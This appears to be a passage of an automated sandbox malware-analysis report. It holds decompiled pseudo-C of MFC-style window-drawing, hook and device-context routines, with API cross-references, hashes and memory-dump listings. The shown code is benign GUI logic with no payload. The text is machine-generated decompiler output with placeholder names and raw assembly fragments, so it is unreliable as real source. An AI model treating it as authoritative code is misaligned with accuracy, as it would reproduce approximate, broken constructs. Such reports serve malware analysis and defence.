						_t240 =  *0x439c9c; // 0x0
						asm("movsd");
						asm("movsd");
						_t446 =  *(_t456 - 0x10);
						 *(_t456 - 0x64) = _t240 + _t446 +  *(_t456 - 0x24);
						E004232C5(_t456 - 0x44, _t456 - 0x70,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
						InflateRect(_t456 - 0x70,  ~( *(_t456 - 0x14)),  ~_t446);
						asm("sbb eax, eax");
						FillRect( *(_t456 - 0x40), _t456 - 0x70,  ~(_t456 - 0x58) &  *(_t456 - 0x54));
						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
						_t260 =  *0x439ca0; // 0x0
						__eflags = _t260;
						if(_t260 != 0) {
							 *(_t456 - 0x18) = SelectObject( *(_t456 - 0x40), _t260);
							_t280 =  *0x436980; // 0x436994
							 *(_t456 - 0x10) = _t280;
							 *(_t456 - 4) = 4;
							E004140EE( *((intOrPtr*)(_t456 - 0x50)), _t456 - 0x10);
							_t421 = _t456 - 0x78;
							asm("sbb esi, esi");
							_t453 = ( ~( *(_t456 - 0x30) & 0x00080000) &  *0x439c98) +  *(_t456 - 0x70);
							GetTextExtentPoint32A( *(_t456 - 0x3c),  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), _t421);
							__eflags =  *(_t456 - 0x78) -  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70);
							if( *(_t456 - 0x78) <=  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70)) {
								E0041A240(_t456 - 0x44, 6);
								asm("cdq");
								_t453 = _t453 + ( *((intOrPtr*)(_t456 - 0x68)) - _t453 - _t421 >> 1);
								__eflags = _t453;
							}
							GetTextMetricsA( *(_t456 - 0x3c), _t456 - 0xb8);
							InflateRect(_t456 - 0x70, 0, 1);
							asm("cdq");
							asm("sbb eax, eax");
							E00419E62(GetSysColor(( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) & 0x000000f6) + 0x13), _t456 - 0x44, _t302);
							E00419DAA(_t456 - 0x44, 1);
							ExtTextOutA( *(_t456 - 0x40), _t453,  *((intOrPtr*)(_t456 - 0x6c)) + ( *(_t456 - 0x64) -  *((intOrPtr*)(_t456 - 0xac)) +  *((intOrPtr*)(_t456 - 0xb0)) +  *((intOrPtr*)(_t456 - 0xb4)) -  *((intOrPtr*)(_t456 - 0x6c)) + 1 - _t421 >> 1), 4, _t456 - 0x70,  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), 0);
							__eflags =  *(_t456 - 0x18);
							if( *(_t456 - 0x18) != 0) {
								SelectObject( *(_t456 - 0x40),  *(_t456 - 0x18));
							}
							 *(_t456 - 4) = 3;
							E00416AEC(_t456 - 0x10);
						}
						__eflags =  *(_t456 - 0x2e) & 0x00000008;
						if(( *(_t456 - 0x2e) & 0x00000008) == 0) {
							L23:
							 *(_t456 - 0x24) =  *(_t456 - 0x64);
							L25:
							 *(_t456 - 0x58) = 0x42cb14;
							 *(_t456 - 4) = 9;
							E0041A668(_t456 - 0x58);
							 *((intOrPtr*)(_t456 - 0x60)) = 0x42cb14;
							 *(_t456 - 4) = 0xa;
							E0041A668(_t456 - 0x60);
							 *((intOrPtr*)(_t456 - 0x4c)) = 0x42cb14;
							 *(_t456 - 4) = 0xb;
						} else {
							E00419B00(_t456 - 0x80);
							 *(_t456 - 4) = 5;
							asm("sbb eax, eax");
							_t267 = E00419BB7(_t456 - 0x80, CreateCompatibleDC( ~(_t456 - 0x44) &  *(_t456 - 0x40)));
							__eflags = _t267;
							if(_t267 != 0) {
								_t268 =  *0x439ca4; // 0x0
								__eflags = _t268;
								if(_t268 == 0) {
									_t447 = 0;
									__eflags = 0;
								} else {
									_t447 = SelectObject( *(_t456 - 0x7c), _t268);
								}
								_t392 =  *0x439c9c; // 0x0
								_t420 =  *0x439c98; // 0x0
								asm("sbb eax, eax");
								BitBlt( *(_t456 - 0x40),  *(_t456 - 0x28),  *(_t456 - 0x24), _t420, _t392,  ~(_t456 - 0x80) &  *(_t456 - 0x7c), 0, 0, 0xcc0020);
								__eflags = _t447;
								if(_t447 != 0) {
									SelectObject( *(_t456 - 0x7c), _t447);
								}
								 *(_t456 - 4) = 3;
								E00419C1F(_t456 - 0x80);
								goto L23;
							} else {
								 *(_t456 - 4) = 3;
								E00419C1F(_t456 - 0x80);
								 *(_t456 - 0x58) = 0x42cb14;
								 *(_t456 - 4) = 6;
								E0041A668(_t456 - 0x58);
								 *((intOrPtr*)(_t456 - 0x60)) = 0x42cb14;
								 *(_t456 - 4) = 7;
								E0041A668(_t456 - 0x60);
								 *((intOrPtr*)(_t456 - 0x4c)) = 0x42cb14;
								 *(_t456 - 4) = 8;
							}
						}
					}
					E0041A668(_t456 - 0x4c);
					_t197 = _t456 - 4;
					 *_t197 =  *(_t456 - 4) | 0xffffffff;
					__eflags =  *_t197;
					_t239 = E0041A48F(_t456 - 0x44);
				} else {
					_t239 = E004136A7(__ecx);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t456 - 0xc));
				return _t239;
			}

0x00423387
0x00423397
0x0042339f
0x004233a2
0x004233ae
0x004233b2
0x004233b9
0x004233c1
0x004233cb
0x004233e1
0x004233e7
0x004233ef
0x004233fa
0x0042340d
0x00423412
0x00423416
0x0042341c
0x00423428
0x00423437
0x0042343c
0x00423440
0x00423446
0x00423452
0x00423461
0x00423472
0x00423479
0x00423480
0x00423482
0x00423484
0x0042348b
0x0042348d
0x004234a5
0x004234ba
0x004234d8
0x004234e0
0x004234e5
0x004234ea
0x004234ed
0x004234f7
0x004234f9
0x004234fd
0x00423500
0x004235e8
0x00423506
0x0042350e
0x0042351e
0x0042352b
0x00423543
0x0042355f
0x0042357b
0x00423580
0x00423594
0x004235aa
0x004235c3
0x004235dc
0x004235e1
0x004235e4
0x004235e4
0x004235f5
0x004235f5
0x004235fb
0x004235ff
0x0042388a
0x00000000
0x00423605
0x0042360b
0x0042360c
0x0042360d
0x00423612
0x00423613
0x00423614
0x0042361c
0x0042362f
0x00423643
0x0042364e
0x0042365b
0x00423671
0x00423676
0x0042367b
0x0042367d
0x0042368d
0x00423690
0x00423695
0x0042369f
0x004236a3
0x004236b4
0x004236bd
0x004236ca
0x004236cd
0x004236d9
0x004236dc
0x004236e3
0x004236ed
0x004236f2
0x004236f2
0x004236f2
0x004236fe
0x00423721
0x00423730
0x00423742
0x00423750
0x0042375a
0x00423779
0x0042377f
0x00423783
0x0042378b
0x0042378b
0x00423794
0x00423798
0x00423798
0x0042379d
0x004237a1
0x00423870
0x00423873
0x0042388f
0x00423894
0x0042389a
0x0042389e
0x004238a3
0x004238a9
0x004238ad
0x004238b2
0x004238b5
0x004237a7
0x004237aa
0x004237b2
0x004237b8
0x004237c8
0x004237cd
0x004237cf
0x0042380c
0x00423811
0x00423813
0x00423823
0x00423823
0x00423815
0x0042381f
0x0042381f
0x00423825
0x0042382e
0x0042383b
0x00423850
0x00423856
0x00423858
0x0042385e
0x0042385e
0x00423867
0x0042386b
0x00000000
0x004237d1
0x004237d4
0x004237d8
0x004237e2
0x004237e8
0x004237ec
0x004237f1
0x004237f7
0x004237fb
0x00423800
0x00423803
0x00423803
0x004237cf
0x004237a1
0x004238bc
0x004238c1
0x004238c1
0x004238c1
0x004238c8
0x004233a4
0x004233a4
0x004233a4
0x004238d3
0x004238db

APIs

__EH_prolog.LIBCMT ref: 00423387
GetWindowRect.USER32 ref: 004233CB
OffsetRect.USER32(?,?,?), ref: 004233E1
GetSysColor.USER32(00000006), ref: 004233FE
CreateSolidBrush.GDI32(00000000), ref: 00423407
GetSysColor.USER32(?), ref: 0042342E
CreateSolidBrush.GDI32(00000000), ref: 00423431
GetSysColor.USER32(?), ref: 00423458
CreateSolidBrush.GDI32(00000000), ref: 0042345B
GetSystemMetrics.USER32 ref: 0042346E
GetSystemMetrics.USER32 ref: 00423475
GetSystemMetrics.USER32 ref: 0042347C
GetSystemMetrics.USER32 ref: 00423482
InflateRect.USER32(?,?,?), ref: 004234BA

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsSystem$BrushColorCreateRectSolid$H_prologInflateOffsetWindow
String ID:
API String ID: 1266645593-0
Opcode ID: 827b8b6824deef71f215e530bef12f339db5eb1673a232190c9b8040d827e70b
Instruction ID: 63fa9e6fd2119b7c539c7c0ae66551d555764ff581325622ef96e7efc3e9d792
Opcode Fuzzy Hash: 827b8b6824deef71f215e530bef12f339db5eb1673a232190c9b8040d827e70b
Instruction Fuzzy Hash: 1A022871E00219ABCF11DFE4DD89EEEBBB9EF08704F14411AE505B7290DB78AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004139FC, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 170
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004139FC(void* __edx, void* _a4, int _a8, long _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				void* __ebp;
				intOrPtr _t50;
				signed int _t52;
				long _t53;
				long _t62;
				long _t70;
				char _t71;
				long _t73;
				CHAR* _t76;
				int _t83;
				signed char _t92;
				void* _t93;
				void* _t95;
				long _t96;
				intOrPtr _t99;
				intOrPtr* _t101;
				intOrPtr _t102;
				CHAR* _t104;
				long _t105;

				_t93 = __edx;
				_t50 = E00425C92(0x4397cc, E0042440D);
				_v8 = _t50;
				if(_a4 != 3) {
					return CallNextHookEx( *(_t50 + 0x2c), _a4, _a8, _a12);
				}
				_t101 =  *((intOrPtr*)(_t50 + 0x14));
				_t95 =  *_a12;
				_t52 =  *(E00424BFB() + 0x14) & 0x000000ff;
				_t83 = _a8;
				_v12 = _t52;
				if(_t101 != 0 || ( *(_t95 + 0x23) & 0x00000040) == 0 && _t52 == 0) {
					if( *0x439c54 == 0) {
						L10:
						if(_t101 == 0) {
							_t53 = GetWindowLongA(_t83, 0xfffffffc);
							_a4 = _t53;
							if(_t53 != 0) {
								_t104 = "AfxOldWndProc423";
								if(GetPropA(_t83, _t104) == 0) {
									SetPropA(_t83, _t104, _a4);
									if(GetPropA(_t83, _t104) == _a4) {
										GlobalAddAtomA(_t104);
										_t62 = E00413980;
										if( *((intOrPtr*)(_v8 + 0x28)) == 0) {
											_t62 = E00413821;
										}
										SetWindowLongA(_t83, 0xfffffffc, _t62);
									}
								}
							}
							goto L27;
						}
						E00413785(_t101, _t83);
						 *((intOrPtr*)( *_t101 + 0x50))();
						_a8 =  *((intOrPtr*)( *_t101 + 0x80))();
						if( *0x439c3c != 0 || _v12 != 0) {
							L18:
							_t105 = E0041381B();
							_t70 = SetWindowLongA(_t83, 0xfffffffc, _t105);
							if(_t70 == _t105) {
								goto L20;
							}
							goto L19;
						} else {
							_t99 =  *0x439c50; // 0x4b2c60
							if(_t99 == 0 ||  *((intOrPtr*)(_t99 + 0x20)) == 0) {
								goto L18;
							} else {
								_push(0);
								_push(0);
								_push(0x36f);
								_push(_t83);
								_push(_t101);
								_t71 = E0041357F(_t93);
								_v20 = _t71;
								if(_t71 == 0) {
									goto L18;
								}
								_a4 = E0041381B();
								_t73 = GetWindowLongA(_t83, 0xfffffffc);
								asm("sbb esi, esi");
								 *((intOrPtr*)(_t99 + 0x20))(_t83, _v20);
								if( ~(_t73 - _a4) + 1 != 0) {
									L20:
									_t102 = _v8;
									 *(_t102 + 0x14) =  *(_t102 + 0x14) & 0x00000000;
									goto L28;
								}
								_t70 = SetWindowLongA(_t83, 0xfffffffc, _a4);
								L19:
								 *_a8 = _t70;
								goto L20;
							}
						}
					}
					if((GetClassLongA(_t83, 0xffffffe6) & 0x00010000) != 0) {
						goto L27;
					}
					_t76 =  *(_t95 + 0x28);
					_t92 = _t76 >> 0x10;
					if(_t92 == 0) {
						_v20 = _v20 & _t92;
						GlobalGetAtomNameA( *(_t95 + 0x28),  &_v20, 5);
						_t76 =  &_v20;
					}
					if(lstrcmpiA(_t76, ?str?) == 0) {
						goto L27;
					} else {
						goto L10;
					}
				} else {
					L27:
					_t102 = _v8;
					L28:
					_t96 = CallNextHookEx( *(_t102 + 0x2c), 3, _t83, _a12);
					if(_v12 != 0) {
						UnhookWindowsHookEx( *(_t102 + 0x2c));
						 *(_t102 + 0x2c) =  *(_t102 + 0x2c) & 0x00000000;
					}
					return _t96;
				}
			}

0x004139fc
0x00413a0c
0x00413a15
0x00413a18
0x00000000
0x00413a26
0x00413a36
0x00413a3a
0x00413a41
0x00413a45
0x00413a48
0x00413a4d
0x00413a68
0x00413ab6
0x00413ab8
0x00413b6a
0x00413b72
0x00413b75
0x00413b7d
0x00413b88
0x00413b8f
0x00413b9c
0x00413b9f
0x00413bac
0x00413bb1
0x00413bb3
0x00413bb3
0x00413bbc
0x00413bbc
0x00413b9c
0x00413b88
0x00000000
0x00413b75
0x00413ac1
0x00413aca
0x00413ade
0x00413ae1
0x00413b44
0x00413b49
0x00413b4f
0x00413b57
0x00000000
0x00000000
0x00000000
0x00413ae9
0x00413ae9
0x00413af1
0x00000000
0x00413af9
0x00413af9
0x00413afb
0x00413afd
0x00413b02
0x00413b03
0x00413b04
0x00413b0b
0x00413b0e
0x00000000
0x00000000
0x00413b18
0x00413b1b
0x00413b2c
0x00413b2f
0x00413b34
0x00413b5e
0x00413b5e
0x00413b61
0x00000000
0x00413b61
0x00413b3c
0x00413b59
0x00413b5c
0x00000000
0x00413b5c
0x00413af1
0x00413ae1
0x00413a78
0x00000000
0x00000000
0x00413a7e
0x00413a83
0x00413a89
0x00413a8b
0x00413a99
0x00413a9f
0x00413a9f
0x00413ab0
0x00000000
0x00000000
0x00000000
0x00000000
0x00413bc2
0x00413bc2
0x00413bc2
0x00413bc5
0x00413bd8
0x00413bda
0x00413bdf
0x00413be5
0x00413be5
0x00000000
0x00413bed

APIs

Part of subcall function 00425C92: TlsGetValue.KERNEL32(004399AC,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000), ref: 00425CD1

CallNextHookEx.USER32 ref: 00413A26
GetClassLongA.USER32 ref: 00413A6D
GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 00413A99
lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_0002440D), ref: 00413AA8
GetWindowLongA.USER32 ref: 00413B1B
SetWindowLongA.USER32 ref: 00413B3C

Strings

ime, xrefs: 00413AA2
`,K, xrefs: 00413AE9
AfxOldWndProc423, xrefs: 00413B7D, 00413B82, 00413B8D, 00413B95, 00413B9E

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
String ID: AfxOldWndProc423$`,K$ime
API String ID: 3731301195-3975106356
Opcode ID: 104baf9216110bbdc268fec6f28eb3b5a99cf74ba741684ded7b0cecb0923a70
Instruction ID: e36065fefe0489718c47fffdee2bb39183bb531f2b2dfd07b326dd1187a37919
Opcode Fuzzy Hash: 104baf9216110bbdc268fec6f28eb3b5a99cf74ba741684ded7b0cecb0923a70
Instruction Fuzzy Hash: C951C531604215ABCF21AF25DC48B9F7BA8FF04762F104525F916A7292D738EE81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00423C5A, Relevance: 28.8, APIs: 19, Instructions: 266
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00423C5A(intOrPtr* __ecx, void* __eflags) {
				void* _t146;
				void* _t150;
				void* _t159;
				void* _t165;
				intOrPtr* _t246;
				RECT* _t250;
				void* _t255;

				E00406520(E0042AAB8, _t255);
				_t246 = __ecx;
				E00405556(_t255 - 0x2c);
				 *(_t255 - 0x2c) = 0x42f0f0;
				 *((intOrPtr*)(_t255 - 4)) = 0;
				E00405556(_t255 - 0x1c);
				 *(_t255 - 0x1c) = 0x42f0f0;
				 *((char*)(_t255 - 4)) = 1;
				E00405556(_t255 - 0x14);
				 *(_t255 - 0x14) = 0x42f0f0;
				 *((char*)(_t255 - 4)) = 2;
				E0041A611(_t255 - 0x1c, CreateRectRgnIndirect( *(_t255 + 8)));
				CopyRect(_t255 - 0x44,  *(_t255 + 8));
				InflateRect(_t255 - 0x44,  ~( *(_t255 + 0xc)),  ~( *(_t255 + 0x10)));
				IntersectRect(_t255 - 0x44, _t255 - 0x44,  *(_t255 + 8));
				E0041A611(_t255 - 0x14, CreateRectRgnIndirect(_t255 - 0x44));
				E0041A611(_t255 - 0x2c, CreateRectRgn(0, 0, 0, 0));
				asm("sbb eax, eax");
				asm("sbb ecx, ecx");
				CombineRgn( *(_t255 - 0x28),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
				_t261 =  *((intOrPtr*)(_t255 + 0x20));
				if( *((intOrPtr*)(_t255 + 0x20)) == 0) {
					 *((intOrPtr*)(_t255 + 0x20)) = E00423BE7(_t261);
				}
				if( *((intOrPtr*)(_t255 + 0x24)) == 0) {
					 *((intOrPtr*)(_t255 + 0x24)) =  *((intOrPtr*)(_t255 + 0x20));
				}
				E00405556(_t255 - 0x24);
				 *(_t255 - 0x24) = 0x42f0f0;
				 *((char*)(_t255 - 4)) = 3;
				E00405556(_t255 - 0x34);
				 *((intOrPtr*)(_t255 - 0x34)) = 0x42f0f0;
				_t250 =  *(_t255 + 0x14);
				 *((char*)(_t255 - 4)) = 4;
				if(_t250 != 0) {
					E0041A611(_t255 - 0x24, CreateRectRgn(0, 0, 0, 0));
					SetRectRgn( *(_t255 - 0x18),  *_t250, _t250->top, _t250->right, _t250->bottom);
					CopyRect(_t255 - 0x44, _t250);
					InflateRect(_t255 - 0x44,  ~( *(_t255 + 0x18)),  ~( *(_t255 + 0x1c)));
					IntersectRect(_t255 - 0x44, _t255 - 0x44, _t250);
					SetRectRgn( *(_t255 - 0x10),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c),  *(_t255 - 0x38));
					asm("sbb eax, eax");
					asm("sbb ecx, ecx");
					CombineRgn( *(_t255 - 0x20),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4))) {
						E0041A611(_t255 - 0x34, CreateRectRgn(0, 0, 0, 0));
						asm("sbb eax, eax");
						asm("sbb ecx, ecx");
						CombineRgn( *(_t255 - 0x30),  ~(_t255 - 0x24) &  *(_t255 - 0x20),  ~(_t255 - 0x2c) &  *(_t255 - 0x28), 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4)) && _t250 != 0) {
					E0041A0FB(_t246, _t255 - 0x24);
					 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
					_t165 = E00419D35(_t246,  *((intOrPtr*)(_t255 + 0x24)));
					PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
					E00419D35(_t246, _t165);
				}
				_t146 = _t255 - 0x34;
				if( *(_t255 - 0x30) == 0) {
					_t146 = _t255 - 0x2c;
				}
				E0041A0FB(_t246, _t146);
				 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
				_t150 = E00419D35(_t246,  *((intOrPtr*)(_t255 + 0x20)));
				_t251 = _t150;
				PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
				if(_t150 != 0) {
					E00419D35(_t246, _t251);
				}
				E0041A0FB(_t246, 0);
				 *((intOrPtr*)(_t255 - 0x34)) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 5;
				E0041A668(_t255 - 0x34);
				 *(_t255 - 0x24) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 6;
				E0041A668(_t255 - 0x24);
				 *(_t255 - 0x14) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 7;
				E0041A668(_t255 - 0x14);
				 *(_t255 - 0x1c) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 8;
				E0041A668(_t255 - 0x1c);
				 *(_t255 - 0x2c) = 0x42cb14;
				 *((intOrPtr*)(_t255 - 4)) = 9;
				_t159 = E0041A668(_t255 - 0x2c);
				 *[fs:0x0] =  *((intOrPtr*)(_t255 - 0xc));
				return _t159;
			}

0x00423c5f
0x00423c6a
0x00423c6f
0x00423c79
0x00423c81
0x00423c84
0x00423c89
0x00423c8f
0x00423c93
0x00423c98
0x00423c9e
0x00423cac
0x00423cb8
0x00423cce
0x00423cdf
0x00423cf3
0x00423d06
0x00423d13
0x00423d1c
0x00423d26
0x00423d2c
0x00423d2f
0x00423d36
0x00423d36
0x00423d3c
0x00423d41
0x00423d41
0x00423d47
0x00423d4c
0x00423d52
0x00423d56
0x00423d5b
0x00423d5e
0x00423d61
0x00423d67
0x00423d7b
0x00423d8e
0x00423d99
0x00423daf
0x00423dbe
0x00423dd3
0x00423de1
0x00423dea
0x00423df4
0x00423e06
0x00423e16
0x00423e23
0x00423e2c
0x00423e36
0x00423e36
0x00423e06
0x00423e48
0x00423e54
0x00423e61
0x00423e69
0x00423e8c
0x00423e95
0x00423e95
0x00423e9d
0x00423ea0
0x00423ea2
0x00423ea2
0x00423ea8
0x00423eb5
0x00423ebd
0x00423ec5
0x00423ee0
0x00423ee8
0x00423eed
0x00423eed
0x00423ef5
0x00423eff
0x00423f05
0x00423f09
0x00423f0e
0x00423f14
0x00423f18
0x00423f1d
0x00423f23
0x00423f27
0x00423f2c
0x00423f32
0x00423f36
0x00423f3b
0x00423f41
0x00423f48
0x00423f53
0x00423f5b

APIs

__EH_prolog.LIBCMT ref: 00423C5F
CreateRectRgnIndirect.GDI32(?), ref: 00423CA2
CopyRect.USER32 ref: 00423CB8
InflateRect.USER32(?,?,?), ref: 00423CCE
IntersectRect.USER32 ref: 00423CDF
CreateRectRgnIndirect.GDI32(?), ref: 00423CE9
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423CFC
CombineRgn.GDI32(?,?,?,00000003), ref: 00423D26
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423D71
SetRectRgn.GDI32(?,?,?,?,?), ref: 00423D8E
CopyRect.USER32 ref: 00423D99
InflateRect.USER32(?,?,?), ref: 00423DAF
IntersectRect.USER32 ref: 00423DBE
SetRectRgn.GDI32(?,?,?,?,?), ref: 00423DD3
CombineRgn.GDI32(?,?,?,00000003), ref: 00423DF4
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423E0C
CombineRgn.GDI32(?,?,?,00000003), ref: 00423E36

Part of subcall function 00423BE7: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004200A6), ref: 00423C26
Part of subcall function 00423BE7: CreatePatternBrush.GDI32(00000000), ref: 00423C33
Part of subcall function 00423BE7: DeleteObject.GDI32(00000000), ref: 00423C3F

Part of subcall function 0041A0FB: SelectClipRgn.GDI32(?,00000000), ref: 0041A11D
Part of subcall function 0041A0FB: SelectClipRgn.GDI32(?,?), ref: 0041A133

Part of subcall function 00419D35: SelectObject.GDI32(?,00000000), ref: 00419D57
Part of subcall function 00419D35: SelectObject.GDI32(?,?), ref: 00419D6D

PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00423E8C
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00423EE0

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prologPattern
String ID:
API String ID: 4023391435-0
Opcode ID: 7749715586c1636e3187dfbc3d35a0f18f947e078070156eb7c5ca2835c41bba
Instruction ID: ab3a66f40d2d04ee3edfb297914df431d927688ea4f6a4c6808893f8cc49b6d9
Opcode Fuzzy Hash: 7749715586c1636e3187dfbc3d35a0f18f947e078070156eb7c5ca2835c41bba
Instruction Fuzzy Hash: A4A146B2A00119EFCF05EFA4DD95DEEBBB9EF08304F14411AF506A2250DB38AE55CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00428C35, Relevance: 25.6, APIs: 17, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00428C35(intOrPtr* __ecx) {
				void* _t19;
				void* _t46;
				void* _t64;

				if( *(__ecx + 4) != 0) {
					_t64 = SelectObject( *(__ecx + 8), GetStockObject(7));
					SelectObject( *(__ecx + 8), _t64);
					SelectObject( *(__ecx + 4), _t64);
					_t46 = SelectObject( *(__ecx + 8), GetStockObject(4));
					SelectObject( *(__ecx + 8), _t46);
					SelectObject( *(__ecx + 4), _t46);
					E00419E06(__ecx, GetROP2( *(__ecx + 8)));
					E00419DAA(__ecx, GetBkMode( *(__ecx + 8)));
					E0041A240(__ecx, GetTextAlign( *(__ecx + 8)));
					E00419DD8(__ecx, GetPolyFillMode( *(__ecx + 8)));
					E00419E34(__ecx, GetStretchBltMode( *(__ecx + 8)));
					_push(GetNearestColor( *(__ecx + 8), GetTextColor( *(__ecx + 8))));
					 *((intOrPtr*)( *__ecx + 0x30))();
					_push(GetNearestColor( *(__ecx + 8), GetBkColor( *(__ecx + 8))));
					return  *((intOrPtr*)( *__ecx + 0x2c))();
				}
				return _t19;
			}

0x00428c3c
0x00428c5b
0x00428c61
0x00428c67
0x00428c73
0x00428c79
0x00428c7f
0x00428c8d
0x00428c9e
0x00428caf
0x00428cc0
0x00428cd1
0x00428ced
0x00428cf0
0x00428d04
0x00000000
0x00428d0c
0x00428d0e

APIs

GetStockObject.GDI32(00000007), ref: 00428C4D
SelectObject.GDI32(00000000,00000000), ref: 00428C59
SelectObject.GDI32(00000000,00000000), ref: 00428C61
SelectObject.GDI32(00000000,00000000), ref: 00428C67
GetStockObject.GDI32(00000004), ref: 00428C6B
SelectObject.GDI32(00000000,00000000), ref: 00428C71
SelectObject.GDI32(00000000,00000000), ref: 00428C79
SelectObject.GDI32(00000000,00000000), ref: 00428C7F
GetROP2.GDI32(00000000), ref: 00428C84

Part of subcall function 00419E06: SetROP2.GDI32(?,?), ref: 00419E1F
Part of subcall function 00419E06: SetROP2.GDI32(?,?), ref: 00419E2D

GetBkMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428C95

Part of subcall function 00419DAA: SetBkMode.GDI32(?,?), ref: 00419DC3
Part of subcall function 00419DAA: SetBkMode.GDI32(?,?), ref: 00419DD1

GetTextAlign.GDI32(00000000), ref: 00428CA6

Part of subcall function 0041A240: SetTextAlign.GDI32(?,?), ref: 0041A25B
Part of subcall function 0041A240: SetTextAlign.GDI32(?,?), ref: 0041A269

GetPolyFillMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428CB7

Part of subcall function 00419DD8: SetPolyFillMode.GDI32(?,?), ref: 00419DF1
Part of subcall function 00419DD8: SetPolyFillMode.GDI32(?,?), ref: 00419DFF

GetStretchBltMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428CC8

Part of subcall function 00419E34: SetStretchBltMode.GDI32(?,?), ref: 00419E4D
Part of subcall function 00419E34: SetStretchBltMode.GDI32(?,?), ref: 00419E5B

GetTextColor.GDI32(00000000), ref: 00428CD9
GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00428AF9,00000000), ref: 00428CE9
GetBkColor.GDI32(00000000), ref: 00428CF6
GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00428AF9,00000000), ref: 00428D00

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
